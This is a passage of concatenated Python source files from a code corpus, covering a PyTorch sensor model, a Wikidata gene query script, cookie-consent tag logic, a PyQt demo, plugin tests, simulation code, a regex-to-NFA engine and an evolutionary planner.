torch.unsqueeze(x, 1)\n x_acc_shoe, x_acc_watch, x_gyro = torch.split(x, split_size=3, dim=3)\n # x_acc_shoe = Variable(torch.transpose(x_acc_shoe, 1, 2))\n # x_acc_watch = Variable(torch.transpose(x_acc_watch, 1, 2))\n # x_gyro = Variable(torch.transpose(x_gyro, 1, 2))\n\n x_acc_shoe = Variable(x_acc_shoe)\n x_acc_watch = Variable(x_acc_watch)\n x_gyro = Variable(x_gyro)\n\n print(x_acc_shoe.shape)\n print(x_acc_watch.shape)\n print(x_gyro.shape)\n\n x_acc_shoe = self.acce_shoe_net(x_acc_shoe)\n x_acc_watch = self.acce_watch_net(x_acc_watch)\n x_gyro = self.gyro_net(x_gyro)\n\n print('-')\n print(x_gyro.shape)\n\n x = torch.cat([x_acc_shoe, x_acc_watch, x_gyro])\n x = self.sensor_net(x)\n\n x, hidden = self.rnn(x)\n\n x = self.dense(x)\n\n return x\n","sub_path":"src/model/deepsense.py","file_name":"deepsense.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"646329036","text":"\"\"\"Output TSV of English Wikipedia article names to gene symbols\n\nFor example, the page https://en.wikipedia.org/wiki/Tumor_necrosis_factor maps\nto the gene symbol \"TNF\". This is output as:\n\nTumor_necrosis_factor\tTNF\n\nin `gene_page_map.tsv`. This script uses the Wikidata Query Service\n(https://query.wikidata.org/) to make a SPARQL query linking articles to\ngenes symbols. The output TSV is used by `views.py`.\n\"\"\"\n\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nfrom pandas import json_normalize\n\noutput_path = \"./data/gene_page_map.tsv\"\n\ndef query_wikidata(sparql_query, sparql_service_url):\n \"\"\"Query endpoint with given query string and return the results as a\n pandas Dataframe.\n \"\"\"\n sparql = SPARQLWrapper(sparql_service_url, agent=\"chrome\")\n\n sparql.setQuery(sparql_query)\n sparql.setReturnFormat(JSON)\n\n result = sparql.query().convert()\n return json_normalize(result[\"results\"][\"bindings\"])\n\ndef query_human_genes_special():\n \"\"\"Execute SPARQL query for article names for special human genes\n\n Some articles about genes are modeled as proteins on Wikidata.\n These tend to be prominent genes, like BRCA1 and TP53.\n \"\"\"\n print(\"Querying human genes, special case...\")\n endpoint_url = \"https://query.wikidata.org/sparql\"\n query = \"\"\"\n SELECT DISTINCT ?item ?gene_symbol ?titleLabel WHERE {\n ?protein schema:about ?item;\n schema:isPartOf ;\n schema:name ?title.\n BIND(REPLACE(STR(?title), \"\\\\\\\\ \", \"_\") AS ?titleLabel)\n ?item wdt:P31 wd:Q8054. # is a protein\n ?item wdt:P703 wd:Q15978631. # found in human\n ?item wdt:P702 ?gene.\n ?gene wdt:P353 ?gene_symbol.\n }\n \"\"\"\n return query_wikidata(query, endpoint_url)\n\ndef query_human_genes_general():\n \"\"\"Execute SPARQL query for article names for general human genes\n\n Almost all articles about genes are modeled as genes on Wikidata.\n This handles the common case.\n \"\"\"\n print(\"Querying human genes, general case...\")\n endpoint_url = \"https://query.wikidata.org/sparql\"\n query = \"\"\"\n SELECT DISTINCT ?item ?ncbi_gene ?itemLabel ?titleLabel WHERE {\n ?gene schema:about ?item;\n schema:isPartOf ;\n schema:name ?title.\n BIND(REPLACE(STR(?title), \"\\\\\\\\ \", \"_\") AS ?titleLabel)\n ?item wdt:P351 ?ncbi_gene;\n wdt:P703 wd:Q15978631. # found in human\n SERVICE wikibase:label\n { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE],en\". }\n }\"\"\"\n\n return query_wikidata(query, endpoint_url)\n\ndef save_human_genes(data_special, data_general, output_path):\n \"\"\"Save results of the gene query locally\n \"\"\"\n print(\"Saving results of gene query locally...\")\n data_special[[\"titleLabel.value\", \"gene_symbol.value\"]].rename(\n columns=lambda col: col.replace(\"Label.value\", \"\")\n ).to_csv(output_path, sep=\"\\t\", index=False)\n data_general[[\"titleLabel.value\", \"itemLabel.value\"]].rename(\n columns=lambda col: col.replace(\"Label.value\", \"\")\n ).to_csv(output_path, sep=\"\\t\", index=False, mode=\"a\", header=False)\n print(\"Results saved to: \" + output_path)\n\n\ngenes_special = query_human_genes_special()\ngenes_general = query_human_genes_general()\nsave_human_genes(genes_special, genes_general, output_path)\n","sub_path":"gene_hints/views/generate_gene_page_map.py","file_name":"generate_gene_page_map.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"643837073","text":"from django.db.models import Q\n\nfrom wagtail_tag_manager.models import Tag, Trigger, TagTypeSettings\n\n\nclass TagStrategy(object):\n def __init__(self, request, consent=None):\n self._request = request\n self._consent = consent\n self._context = Tag.create_context(request)\n\n self._cookies = request.COOKIES\n self._config = TagTypeSettings.all()\n self._tags = []\n\n self.cookies = {}\n\n self.define_strategy()\n\n # https://gist.github.com/jberghoef/9ffa2b738cbb0aab624ff091dc6fe9a7\n def define_strategy(self):\n for tag_type, tag_config in self._config.items():\n handler = getattr(self, self._request.method.lower(), None)\n if handler:\n handler(tag_type, tag_config)\n\n def get(self, tag_type, tag_config):\n cookie_name = Tag.get_cookie_name(tag_type)\n cookie = self._cookies.get(cookie_name, None)\n\n if tag_config == \"required\":\n # Include required instant tags\n # Include required cookie\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n elif tag_config == \"initial\":\n if not cookie or cookie == \"unset\":\n # Include initial cookie\n self.cookies[cookie_name] = \"unset\"\n elif cookie == \"true\":\n # Include initial instant tags\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n else:\n if cookie == \"true\":\n # Include generic instant tags\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n\n def post(self, tag_type, tag_config):\n cookie_name = Tag.get_cookie_name(tag_type)\n cookie = self._cookies.get(cookie_name, None)\n\n if tag_config == \"required\":\n # Include required lazy tags\n # Include required cookie\n if self._consent is None:\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n if cookie != \"true\":\n self.cookies[cookie_name] = \"true\"\n\n elif self._consent is None:\n if tag_config == \"initial\":\n if cookie == \"unset\":\n # Include initial lazy tags\n # Include initial instant tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n elif cookie == \"true\":\n # Include initial lazy tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n else:\n if cookie == \"true\":\n # Include generic lazy tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n\n elif self._consent is True:\n if tag_config == \"initial\":\n if cookie == \"false\":\n # Include initial lazy tags\n # Include initial instant tags\n # Include initial cookie\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n else:\n if cookie == \"true\":\n pass\n else:\n # Include generic lazy tags\n # Include generic instant tags\n # Include generic cookie\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n\n elif self._consent is False:\n self.cookies[cookie_name] = \"false\"\n\n def should_include(self, tag_type, tag_config):\n cookie_name = Tag.get_cookie_name(tag_type)\n cookie = self._cookies.get(cookie_name, None)\n\n if tag_config == \"required\":\n return True\n elif tag_config == \"initial\":\n if not cookie or cookie == \"unset\" or cookie == \"true\":\n return True\n else:\n if cookie == \"true\":\n return True\n\n @property\n def queryset(self):\n queryset = Q()\n for tag_type in self._tags:\n queryset.add(Q(tag_loading=tag_type[0]) & Q(tag_type=tag_type[1]), Q.OR)\n return queryset\n\n @property\n def tags(self):\n if self._tags:\n return Tag.objects.active().filter(self.queryset)\n else:\n return Tag.objects.none()\n\n @property\n def result(self):\n result = [\n {\"object\": tag, \"element\": tag.get_doc(self._request, self._context)}\n for tag in self.tags\n ]\n\n for trigger in Trigger.objects.active():\n match = trigger.match(self._request)\n if match is not None:\n for tag in trigger.tags.filter(self.queryset):\n result.append(\n {\n \"object\": tag,\n \"element\": tag.get_doc(\n self._request, {**self._context, **match.groupdict()}\n ),\n }\n )\n\n return result\n\n @property\n def cookie_state(self):\n return {\n tag_type: self.cookies.get(Tag.get_cookie_name(tag_type), \"false\")\n != \"false\"\n for tag_type in Tag.get_types()\n }\n","sub_path":"src/wagtail_tag_manager/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510929672","text":"import sys\nimport random\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nclass MyApp(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.ed_1 = QtWidgets.QTextEdit()\n self.ed_2 = QtWidgets.QLineEdit()\n\n self.lbl_1 = QtWidgets.QLabel(\"count:\")\n\n self.btn_next = QtWidgets.QPushButton(\"Next\")\n self.btn_back = QtWidgets.QPushButton(\"Back\")\n\n self.h_box = QtWidgets.QHBoxLayout()\n self.v_box = QtWidgets.QVBoxLayout()\n\n self.set_up()\n self.show()\n\n def set_up(self):\n self.setFont(QtGui.QFont(\"Arial\", 12))\n self.setWindowTitle(\"Hello Word!\")\n self.setGeometry(100, 100, 600, 400)\n icons = {\n 0: QtGui.QIcon(\"icon\\\\chameleon.ico\"),\n 1: QtGui.QIcon(\"icon\\\\aol_mail.ico\"),\n 2: QtGui.QIcon(\"icon\\\\emotion_darth_wader.ico\")\n }\n\n self.setWindowIcon(icons.get((random.randint(0, 9) % 3)))\n\n text = \"\"\"In this text I want to highlight this zzwordyy and only this word.\\n\"\"\" + \\\n \"\"\"Any other word shouldn't be highlighted\"\"\"\n self.ed_1.setText(text)\n\n self.ed_2.setValidator(QtGui.QIntValidator())\n\n self.h_box.addWidget(self.lbl_1)\n self.h_box.addWidget(self.ed_2)\n\n self.btn_next.clicked.connect(self.btn_next_click)\n self.btn_back.clicked.connect(self.btn_back_click)\n self.h_box.addWidget(self.btn_next)\n self.h_box.addWidget(self.btn_back)\n\n self.v_box.addWidget(self.ed_1)\n self.v_box.addLayout(self.h_box)\n\n self.setLayout(self.v_box)\n\n def btn_next_click(self):\n try:\n cursor = self.ed_1.textCursor()\n print(cursor.position())\n self.ed_1.setFocus()\n if self.ed_2.text():\n # cursor.setPosition(int(self.ed_2.text()))\n cursor.movePosition(QtGui.QTextCursor.Right, QtGui.QTextCursor.MoveAnchor, int(self.ed_2.text()))\n print(cursor.block().text())\n print(cursor.position())\n self.ed_1.setTextCursor(cursor)\n except Exception as e:\n print(e)\n\n def btn_back_click(self):\n cursor = self.ed_1.textCursor()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MyApp()\n sys.exit(app.exec_())","sub_path":"PyQtPractice/TextCursor.py","file_name":"TextCursor.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"20617926","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nWrite a program which contains one function named as Add() which accepts two numbers\r\nfrom user and return addition of that two numbers.\r\nInput : 11 5 Output : 16\r\n4.Write a program which display 5 times Marvellous\r\n\"\"\"\r\n\r\ndef add(x,y):\r\n z=x+y\r\n return z\r\n \r\ndef main():\r\n no1=int(input(\"enter the number\"))\r\n no2=int(input(\"enter the number\"))\r\n p=add(no1,no2)\r\n print(\"addition of{} and {} is {}\".format(no1,no2,p))\r\n\r\nif __name__==\"__main__\":\r\n main() ","sub_path":"1 .assignments/3 addition.py","file_name":"3 addition.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"174643671","text":"import functools\nimport mock\nfrom StringIO import StringIO\nimport unittest\n\nfrom girder_worker_utils import decorators\nfrom girder_worker_utils import types\nfrom girder_worker import entrypoint\nfrom girder_worker.__main__ import main\nfrom girder_worker.app import app\n\n\nclass set_namespace(object):\n def __init__(self, namespace):\n self.namespace = namespace\n\n def __call__(self, func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n original = entrypoint.NAMESPACE\n entrypoint.NAMESPACE = self.namespace\n try:\n result = func(*args, **kwargs)\n finally:\n entrypoint.NAMESPACE = original\n return result\n return wrapped\n\n\nclass TestTaskPlugin(unittest.TestCase):\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n def test_get_extension_manager(self):\n mgr = entrypoint.get_extension_manager()\n names = sorted(mgr.names())\n self.assertEqual(names, ['core', 'plugin1', 'plugin2'])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n def test_get_core_task_modules(self):\n modules = entrypoint.get_core_task_modules()\n self.assertEqual(modules, ['os.path'])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.entrypoint.import_module')\n def test_import_all_includes(self, imp):\n entrypoint.import_all_includes()\n imp.assert_has_calls(\n (mock.call('os.path'), mock.call('girder_worker._test_plugins.tasks')),\n any_order=True\n )\n\n @set_namespace('girder_worker._test_plugins.invalid_plugins')\n @mock.patch('sys.stderr', new_callable=StringIO)\n @mock.patch('sys.stdout', new_callable=StringIO)\n def test_invalid_plugins(self, stdout, stderr):\n entrypoint.get_plugin_task_modules()\n lines = stdout.getvalue().splitlines()\n self.assertEqual(len(lines), 4)\n for line in lines:\n self.assertRegexpMatches(\n line, '^Problem.*(exception[12]|invalid|import), skipping$'\n )\n\n self.assertEqual(entrypoint.get_core_task_modules(), ['os.path'])\n\n @mock.patch('girder_worker.__main__.app')\n def test_core_plugin(self, app):\n main()\n app.conf.update.assert_any_call({'CELERY_IMPORTS':\n ['girder_worker.tasks']})\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.__main__.app')\n def test_external_plugins(self, app):\n main()\n app.conf.update.assert_any_call({'CELERY_IMPORTS':\n ['os.path']})\n app.conf.update.assert_any_call({'CELERY_INCLUDE':\n ['girder_worker._test_plugins.tasks']})\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.__main__.app')\n def test_get_extensions(self, app):\n main()\n extensions = sorted(entrypoint.get_extensions())\n self.assertEqual(extensions, ['core', 'plugin1', 'plugin2'])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.__main__.app')\n def test_get_module_tasks(self, app):\n main()\n extensions = sorted(entrypoint.get_module_tasks('girder_worker._test_plugins.tasks'))\n self.assertEqual(extensions, [\n 'girder_worker._test_plugins.tasks.celery_task',\n 'girder_worker._test_plugins.tasks.function_task'\n ])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.__main__.app')\n def test_get_extension_tasks(self, app):\n main()\n extensions = sorted(entrypoint.get_extension_tasks('plugin2'))\n self.assertEqual(extensions, [\n 'girder_worker._test_plugins.tasks.celery_task',\n 'girder_worker._test_plugins.tasks.function_task'\n ])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n @mock.patch('girder_worker.__main__.app')\n def test_get_extension_tasks_celery(self, app):\n main()\n extensions = sorted(entrypoint.get_extension_tasks('plugin2', celery_only=True))\n self.assertEqual(extensions, [\n 'girder_worker._test_plugins.tasks.celery_task'\n ])\n\n def test_register_extension(self):\n\n @decorators.argument('n', types.Integer)\n def echo(n):\n return n\n\n @app.task\n @decorators.argument('n', types.Integer)\n def echo_celery(n):\n return n\n\n tasks = {\n '%s.echo' % __name__: echo,\n '%s.echo_celery' % __name__: echo_celery\n }\n entrypoint.register_extension('echo_tasks', tasks)\n\n exts = entrypoint.get_extensions()\n self.assertIn('echo_tasks', exts)\n self.assertEqual(entrypoint.get_extension_tasks('echo_tasks'), tasks)\n\n celery_tasks = entrypoint.get_extension_tasks('echo_tasks', celery_only=True)\n self.assertEqual(celery_tasks.keys(), ['%s.echo_celery' % __name__])\n","sub_path":"tests/task_plugin_test.py","file_name":"task_plugin_test.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"481494270","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 10 13:11:31 2020\r\n\r\n@author: r2d2go\r\n\r\n\"\"\"\r\nimport math\r\nimport numpy as np\r\n\r\nimport random as random\r\n\r\n\r\nclass Rat(object):\r\n def __init__(self, decks, changerate, players, dim, initialDist):\r\n \"\"\"\r\n Initialize the chain instance.\r\n \r\n We have (players) number of players, each with one of (decks) decks. \r\n We then consider the expected outcome when (dim) of them interact.\r\n \r\n Initialize: Randomly generate possible player ratios and the current ratio based on initialDist.\r\n \r\n Parameters\r\n ----------\r\n \r\n decks: int\r\n number of decks\r\n \r\n changerate: dictionary\r\n Dictionary of change rates, indexed by coordinates on the tensor, seperated by dashes (e.g. \"0-3\" in a 4x4 matrix is the upper right corner).\r\n The last index indicates what the resulting change rate adds to.\r\n \r\n players: int\r\n Number of players\r\n \r\n dim: int \r\n dimension of tensor\r\n \r\n initialDist: list\r\n List of probabilities of being in a given deck.\r\n \r\n playerCount: list\r\n List of the number of players with a given deck (indexed as decks)\r\n \r\n \"\"\"\r\n self.decks = decks\r\n self.changerate = changerate\r\n self.players = players\r\n self.initialDist = initialDist.copy()\r\n self.playerCount = []\r\n self.bumps = 0\r\n self.dim = dim\r\n for deckI in range(decks):\r\n self.playerCount.append(0)\r\n for playerI in range(players):\r\n deckRand = random.uniform(0,1)\r\n deckI = 0\r\n distI = 0\r\n while distI < decks:\r\n deckI += initialDist[distI]\r\n if deckRand < deckI:\r\n self.playerCount[distI] += 1\r\n distI = decks+1\r\n distI += 1\r\n \r\n def advance(self, playerrat):\r\n \"\"\"\r\n playerrat: float\r\n proportion of players being advanced\r\n \"\"\"\r\n self.playerrat = playerrat\r\n gamecount = math.floor(self.playerrat*self.players)\r\n tempCount = self.playerCount.copy()\r\n \r\n for gameI in range(gamecount):\r\n listOfDecks = []\r\n for i in range(self.dim):\r\n listOfDecks.append(0)\r\n for i in range(self.dim):\r\n deck = 0\r\n rand = random.randint(1,self.players) \r\n while deck < self.decks:\r\n rand -= self.playerCount[deck]\r\n if rand <= 0:\r\n listOfDecks[i] = deck\r\n deck = 1000000000000\r\n deck += 1\r\n deckKey = \"\"\r\n for i in listOfDecks:\r\n deckKey += str(i)+\"-\"\r\n deckAdd = 0\r\n rollI = 0\r\n gameRoll = random.uniform(0,1)\r\n for i in listOfDecks:\r\n rollI += self.changerate[deckKey+str(i)]\r\n if gameRoll < rollI:\r\n tempCount[i] -= 1\r\n tempCount[deckAdd] += 1\r\n deckAdd += 1\r\n \r\n self.playerCount = tempCount\r\n \r\n def generate_states(self, runLength, playerrat):\r\n \"\"\"\r\n Generates states for a run of length runLength.\r\n \r\n Parameters\r\n ----------\r\n \r\n runLength: int\r\n The number of future states to generate.\r\n \"\"\"\r\n self.runLength = runLength\r\n self.playerrat = playerrat\r\n runList = []\r\n for i in range(runLength):\r\n runList.append(self.playerCount.copy())\r\n self.advance(playerrat)\r\n return runList\r\n \r\n def average(self, initialDist, runLength, runs, playerrat):\r\n \"\"\"\r\n Generates a number of runs and finds the average ratio of players over time.\r\n \r\n Parameters\r\n ----------\r\n \r\n runs: int\r\n The number of runs to generate.\r\n \r\n \"\"\"\r\n self.runs = runs\r\n self.runLength = runLength\r\n self.playerrat = playerrat\r\n \r\n longAverage = []\r\n blankState = []\r\n for deck in range (self.decks):\r\n blankState.append(0)\r\n for run in range(runLength):\r\n longAverage.append(blankState.copy())\r\n for run in range(runs):\r\n self.playerCount = []\r\n for deckI in range(self.decks):\r\n self.playerCount.append(0)\r\n for playerI in range(self.players):\r\n deckRand = random.uniform(0,1)\r\n deckI = 0\r\n distI = 0\r\n while distI < self.decks:\r\n deckI += initialDist[distI]\r\n if deckRand < deckI:\r\n self.playerCount[distI] += 1\r\n distI = self.decks+1\r\n distI += 1\r\n runList = self.generate_states(runLength, playerrat)\r\n for state in range(runLength):\r\n for deckRat in range(self.decks):\r\n longAverage[state][deckRat] += runList[state][deckRat]\r\n for deck in range(self.decks):\r\n for state in range(runLength):\r\n longAverage[state][deck] = longAverage[state][deck]/runs/self.players\r\n return(longAverage)\r\n ","sub_path":"generalizedNDimRun.py","file_name":"generalizedNDimRun.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439228668","text":"from collections import Callable, Iterable, OrderedDict, Mapping\nfrom functools import reduce\n\nimport numpy as np\nfrom multidict import MultiDict\n\n__all__ = ['Bunch', 'EnrichedTuple', 'ReducerMap', 'DefaultOrderedDict']\n\n\nclass Bunch(object):\n \"\"\"\n Bind together an arbitrary number of generic items. This is a mutable\n alternative to a ``namedtuple``.\n\n From: ::\n\n http://code.activestate.com/recipes/52308-the-simple-but-handy-collector-of\\\n -a-bunch-of-named/?in=user-97991\n \"\"\"\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n\n\nclass EnrichedTuple(tuple):\n \"\"\"\n A tuple with an arbitrary number of additional attributes.\n \"\"\"\n def __new__(cls, *items, getters=None, **kwargs):\n obj = super(EnrichedTuple, cls).__new__(cls, items)\n obj.__dict__.update(kwargs)\n obj._getters = dict(zip(getters or [], items))\n return obj\n\n def __getitem__(self, key):\n if isinstance(key, int):\n return super(EnrichedTuple, self).__getitem__(key)\n else:\n return self._getters[key]\n\n\nclass ReducerMap(MultiDict):\n \"\"\"\n Specialised :class:`MultiDict` object that maps a single key to a\n list of potential values and provides a reduction method for\n retrieval.\n \"\"\"\n\n def update(self, values):\n \"\"\"\n Update internal mapping with standard dictionary semantics.\n \"\"\"\n if isinstance(values, Mapping):\n self.extend(values)\n elif isinstance(values, Iterable) and not isinstance(values, str):\n for v in values:\n self.extend(v)\n else:\n self.extend(values)\n\n def unique(self, key):\n \"\"\"\n Returns a unique value for a given key, if such a value\n exists, and raises a ``ValueError`` if it does not.\n\n :param key: Key for which to retrieve a unique value\n \"\"\"\n candidates = self.getall(key)\n\n def compare_to_first(v):\n first = candidates[0]\n if isinstance(first, np.ndarray) or isinstance(v, np.ndarray):\n return (first == v).all()\n else:\n return first == v\n\n if len(candidates) == 1:\n return candidates[0]\n elif all(map(compare_to_first, candidates)):\n return candidates[0]\n else:\n raise ValueError(\"Unable to find unique value for key %s, candidates: %s\"\n % (key, candidates))\n\n def reduce(self, key, op=None):\n \"\"\"\n Returns a reduction of all candidate values for a given key.\n\n :param key: Key for which to retrieve candidate values\n :param op: Operator for reduction among candidate values.\n If not provided, a unique value will be returned,\n or a ``ValueError`` raised if no unique value exists.\n \"\"\"\n if op is None:\n # Return a unique value if it exists\n return self.unique(key)\n else:\n return reduce(op, self.getall(key))\n\n def reduce_all(self):\n \"\"\"\n Returns a dictionary with reduced/unique values for all keys.\n \"\"\"\n return {k: self.reduce(key=k) for k in self}\n\n\nclass DefaultOrderedDict(OrderedDict):\n # Source: http://stackoverflow.com/a/6190500/562769\n def __init__(self, default_factory=None, *a, **kw):\n if (default_factory is not None and\n not isinstance(default_factory, Callable)):\n raise TypeError('first argument must be callable')\n OrderedDict.__init__(self, *a, **kw)\n self.default_factory = default_factory\n\n def __getitem__(self, key):\n try:\n return OrderedDict.__getitem__(self, key)\n except KeyError:\n return self.__missing__(key)\n\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n self[key] = value = self.default_factory()\n return value\n\n def __reduce__(self):\n if self.default_factory is None:\n args = tuple()\n else:\n args = self.default_factory,\n return type(self), args, None, None, self.items()\n\n def copy(self):\n return self.__copy__()\n\n def __copy__(self):\n return type(self)(self.default_factory, self)\n","sub_path":"devito/tools/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107154309","text":"class Token:\n def __init__(self, nom, valeur):\n self.nom = nom\n self.valeur = valeur\n\n def __str__(self):\n return self.nom + \":\" + self.valeur\n\nclass Lexer:\n def __init__(self, pattern):\n self.origine = pattern\n self.symboles = {'(':'PAREN_GAUCHE', ')':'PAREN_DROITE', '*':'ETOILE', '\\x08':'CONCAT', '+':'PLUS', '?':'INTERROGATION'}\n self.actuel = 0\n self.taille = len(self.origine)\n \n def prendre_token(self): \n if self.actuel < self.taille:\n c = self.origine[self.actuel]\n self.actuel += 1\n if c not in self.symboles.keys(): # CHAR\n token = Token('CHAR', c)\n else:\n token = Token(self.symboles[c], c)\n return token\n else:\n return Token('AUCUN', '')\n\nclass Parseur:\n def __init__(self, lexer):\n self.lexer = lexer\n self.tokens = []\n self.lookahead = self.lexer.prendre_token()\n \n def considerer(self, nom):\n if self.lookahead.nom == nom:\n self.lookahead = self.lexer.prendre_token()\n\n def parse(self):\n self.term()\n return self.tokens\n \n def term(self):\n self.operateur()\n if self.lookahead.valeur not in ')':\n self.term()\n self.tokens.append(Token('CONCAT', '\\x08'))\n \n def operateur(self):\n self.primary()\n if self.lookahead.nom in ['ETOILE', 'PLUS', 'INTERROGATION']:\n self.tokens.append(self.lookahead)\n self.considerer(self.lookahead.nom)\n\n def primary(self):\n if self.lookahead.nom == 'PAREN_GAUCHE':\n self.considerer('PAREN_GAUCHE')\n self.term()\n self.considerer('PAREN_DROITE')\n elif self.lookahead.nom == 'CHAR':\n self.tokens.append(self.lookahead)\n self.considerer('CHAR')\n\nclass Etat:\n def __init__(self, nom):\n self.epsilon = []\n self.transitions = {}\n self.nom = nom\n self.est_fin = False\n \nclass NFA:\n def __init__(self, debut, fin):\n self.debut = debut\n self.fin = fin\n fin.est_fin = True\n \n def ajouteretat(self, etat, ensemble_etat):\n if etat in ensemble_etat:\n return\n ensemble_etat.add(etat)\n for eps in etat.epsilon:\n self.ajouteretat(eps, ensemble_etat)\n \n def match(self,s):\n etats_actuels = set()\n self.ajouteretat(self.debut, etats_actuels)\n \n for c in s:\n prochains_etats = set()\n for etat in etats_actuels:\n if c in etat.transitions.keys():\n etat_transitoire = etat.transitions[c]\n self.ajouteretat(etat_transitoire, prochains_etats)\n \n etats_actuels = prochains_etats\n\n for s in etats_actuels:\n if s.est_fin:\n return True\n return False\n\nclass Manipulateur:\n def __init__(self):\n self.manipulateurs = {'CHAR':self.gerer_char, 'CONCAT':self.gerer_concat,\n 'ETOILE':self.gerer_rep,\n 'PLUS':self.gerer_rep, 'INTERROGATION':self.gerer_interrogation}\n self.etat_count = 0\n\n def creer_etat(self):\n self.etat_count += 1\n return Etat('s' + str(self.etat_count))\n \n def gerer_char(self, t, pile_nfa):\n s0 = self.creer_etat()\n s1 = self.creer_etat()\n s0.transitions[t.valeur] = s1\n nfa = NFA(s0, s1)\n pile_nfa.append(nfa)\n \n def gerer_concat(self, t, pile_nfa):\n n2 = pile_nfa.pop()\n n1 = pile_nfa.pop()\n n1.fin.est_fin = False\n n1.fin.epsilon.append(n2.debut)\n nfa = NFA(n1.debut, n2.fin)\n pile_nfa.append(nfa)\n \n def gerer_rep(self, t, pile_nfa):\n n1 = pile_nfa.pop()\n s0 = self.creer_etat()\n s1 = self.creer_etat()\n s0.epsilon = [n1.debut]\n if t.nom == 'ETOILE':\n s0.epsilon.append(s1)\n n1.fin.epsilon.extend([s1, n1.debut])\n n1.fin.est_fin = False\n nfa = NFA(s0, s1)\n pile_nfa.append(nfa)\n\n def gerer_interrogation(self, t, pile_nfa):\n n1 = pile_nfa.pop()\n n1.debut.epsilon.append(n1.fin)\n pile_nfa.append(n1)\n\n","sub_path":"Automate.py","file_name":"Automate.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"407948489","text":"\"\"\" RMHC for simulated environments \"\"\"\n# Copyright (c) 2020, - All Rights Reserved\n# This file is part of the Evolutionary Planning on a Learned World Model thesis.\n# Unauthorized copying of this file, via any medium is strictly prohibited without the consensus of the authors.\n# Written by Thor V.A.N. Olesen & Dennis T.T. Nguyen .\n\nimport copy\nimport torch\nimport numpy as np\nfrom concurrent.futures import as_completed\nfrom planning.interfaces.individual import Individual\nfrom tuning.evolution_handler import EvolutionHandler\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom planning.interfaces.abstract_hill_climb_simulation import AbstractRandomMutationHillClimbing\nfrom tqdm import tqdm\n\n\nclass RMHC(AbstractRandomMutationHillClimbing):\n def __init__(self, horizon, max_generations, is_shift_buffer, is_rollout, max_rollouts=None, rollout_length=None,\n is_parallel_rollouts=False):\n super().__init__(horizon, max_generations, is_shift_buffer, is_rollout, max_rollouts, rollout_length)\n self.current_elite = None\n self.latent = None\n self.hidden = None\n self.elite_history = []\n self.is_parallel_rollouts = is_parallel_rollouts\n\n self.evolution_handler = EvolutionHandler(self.horizon)\n self.mutation_operator = self.evolution_handler.get_mutation_operator()\n\n def search(self, environment, latent, hidden):\n self.latent = latent\n self.hidden = hidden\n self.elite_history = []\n self.current_elite = self._initialize_individual(environment)\n self._evaluate_individual(self.current_elite, environment)\n self._append_elite(self.current_elite)\n\n for generation in range(self.max_generations):\n self._step_generation(generation, environment)\n\n best_action = self.current_elite.action_sequence[0]\n return best_action, self.elite_history\n\n def _step_generation(self, generation, environment):\n mutated_individual = self._mutate(environment, self.current_elite, generation)\n self.current_elite = self._select_best_individual(self.current_elite, mutated_individual, environment)\n\n def _initialize_individual(self, environment):\n if self.is_shift_buffer and self.current_elite is not None:\n individual = self._shift_buffer(environment, self.current_elite)\n else:\n action_sequence = []\n for _ in range(self.horizon):\n action_sequence.append(environment.sample())\n individual = 